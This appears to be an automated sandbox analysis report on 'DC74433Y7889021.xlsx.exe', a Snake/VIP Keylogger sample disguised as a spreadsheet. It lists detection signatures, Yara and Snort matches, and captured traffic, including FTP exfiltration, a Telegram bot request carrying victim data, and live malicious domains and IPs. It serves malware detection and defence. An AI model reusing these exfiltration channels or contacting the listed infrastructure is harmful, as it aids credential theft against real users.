
Windows Analysis Report
DC74433Y7889021.xlsx.exe

Overview

General Information

Sample name:DC74433Y7889021.xlsx.exe
Analysis ID:1474973
MD5:6fd5c95f3bc8ac876f1babed1b839dcd
SHA1:b35d7e77ac643ab5d9bbe7442553aa82ac1379c3
SHA256:d1fcbf364ad31af81a9612d9633e1b6598375983354390bfaa32b5ea5a7c3a6d
Tags:exe

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Sigma detected: Suspicious Double Extension File Execution
Snort IDS alert for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code references suspicious native API functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • DC74433Y7889021.xlsx.exe (PID: 2488 cmdline: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe" MD5: 6FD5C95F3BC8AC876F1BABED1B839DCD)
    • DC74433Y7889021.xlsx.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe" MD5: 6FD5C95F3BC8AC876F1BABED1B839DCD)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown | Strings:
  • 0x2d39e:$a1: get_encryptedPassword
  • 0x2d6bb:$a2: get_encryptedUsername
  • 0x2d1ae:$a3: get_timePasswordChanged
  • 0x2d2b7:$a4: get_passwordField
  • 0x2d3b4:$a5: set_encryptedPassword
  • 0x2e9f6:$a7: get_logins
  • 0x2e959:$a10: KeyLoggerEventArgs
  • 0x2e5ec:$a11: KeyLoggerEventArgsEventHandler
Source: 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack | Rule: JoeSecurity_VIPKeylogger | Description: Yara detected VIP Keylogger | Author: Joe Security
Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.unpack | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack | Rule: JoeSecurity_GenericDownloader_1 | Description: Yara detected Generic Downloader | Author: Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe", CommandLine: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe, NewProcessName: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe", ProcessId: 2488, ProcessName: DC74433Y7889021.xlsx.exe
Timestamp:07/17/24-14:17:22.648999
SID:2845532
Source Port:49756
Destination Port:21
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:2024-07-17T14:17:08.911771+0200
SID:2803305
Source Port:49742
Destination Port:443
Protocol:TCP
Classtype:Unknown Traffic

Timestamp:2024-07-17T14:19:21.508196+0200
SID:2845532
Source Port:49756
Destination Port:21
Protocol:TCP
Classtype:Malware Command and Control Activity Detected

Timestamp:2024-07-17T14:17:11.365188+0200
SID:2803305
Source Port:49747
Destination Port:443
Protocol:TCP
Classtype:Unknown Traffic

Timestamp:2024-07-17T14:17:05.037579+0200
SID:2803274
Source Port:49730
Destination Port:80
Protocol:TCP
Classtype:Potentially Bad Traffic

Timestamp:2024-07-17T14:17:58.639130+0200
SID:2022930
Source Port:443
Destination Port:49763
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:2024-07-17T14:17:20.554901+0200
SID:2022930
Source Port:443
Destination Port:49753
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:2024-07-17T14:17:05.614505+0200
SID:2803305
Source Port:49735
Destination Port:443
Protocol:TCP
Classtype:Unknown Traffic

Timestamp:2024-07-17T14:17:06.146860+0200
SID:2803274
Source Port:49736
Destination Port:80
Protocol:TCP
Classtype:Potentially Bad Traffic


AV Detection

Source: DC74433Y7889021.xlsx.exe | Avira: detected
Source: http://anotherarmy.dns.army:8081 | Avira URL Cloud: Label: malware
Source: http://aborters.duckdns.org:8081 | Avira URL Cloud: Label: malware
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: DC74433Y7889021.xlsx.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: DC74433Y7889021.xlsx.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: DC74433Y7889021.xlsx.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb | source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688208679.0000000005620000.00000004.08000000.00040000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb | source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdbt | source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 023BF45Dh | 1_2_023BF2C0
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 023BF45Dh | 1_2_023BF4AC
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 023BFC19h | 1_2_023BF961
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060E0D0Dh | 1_2_060E0B30
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060E1697h | 1_2_060E0B30
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060E2C19h | 1_2_060E2968
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060E31E0h | 1_2_060E2DC8
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EE0A9h | 1_2_060EDE00
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EE501h | 1_2_060EE258
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 1_2_060E0673
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EE959h | 1_2_060EE6B0
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EEDB1h | 1_2_060EEB08
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EF209h | 1_2_060EEF60
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EF661h | 1_2_060EF3B8
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EFAB9h | 1_2_060EF810
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 1_2_060E0040
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 1_2_060E0853
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060ECF49h | 1_2_060ECCA0
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060ED3A1h | 1_2_060ED0F8
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060E31E0h | 1_2_060E310E
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060ED7F9h | 1_2_060ED550
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060EDC51h | 1_2_060ED9A8
Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe | Code function: 4x nop then jmp 060E31E0h | 1_2_060E2DC2

Networking

Source: Traffic | Snort IDS: 2845532 ETPRO TROJAN SnakeKeylogger Exfil via FTP M1 192.168.2.4:49756 -> 213.189.52.181:21
Source: global traffic | TCP traffic: 213.189.52.181 ports 64212,63014,64119,1,2,21
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 1.2.DC74433Y7889021.xlsx.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.4:49759 -> 213.189.52.181:64212
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2017/07/2024%20/%2019:03:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 193.122.130.0
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: ECO-ATMAN-PLECO-ATMAN-PL
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | FTP traffic detected: 213.189.52.181:21 -> 192.168.2.4:49756 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- | 220-You are user number 19 of 150 allowed. | 220-Local time is now 14:17. Server port: 21. | 220-This is a private system - No anonymous login | 220 You will be disconnected after 15 minutes of inactivity.
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: global traffic | DNS traffic detected: DNS query: s4.serv00.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 17 Jul 2024 12:17:14 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688812814.00000000072B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024DF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.0000000002480000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000355E000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003702000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003585000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000034EB000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003560000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.0000000003518000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.00000000036BC000.00000004.00000800.00020000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000001.00000002.4133896624.000000000368F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4130524179.00000000024EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
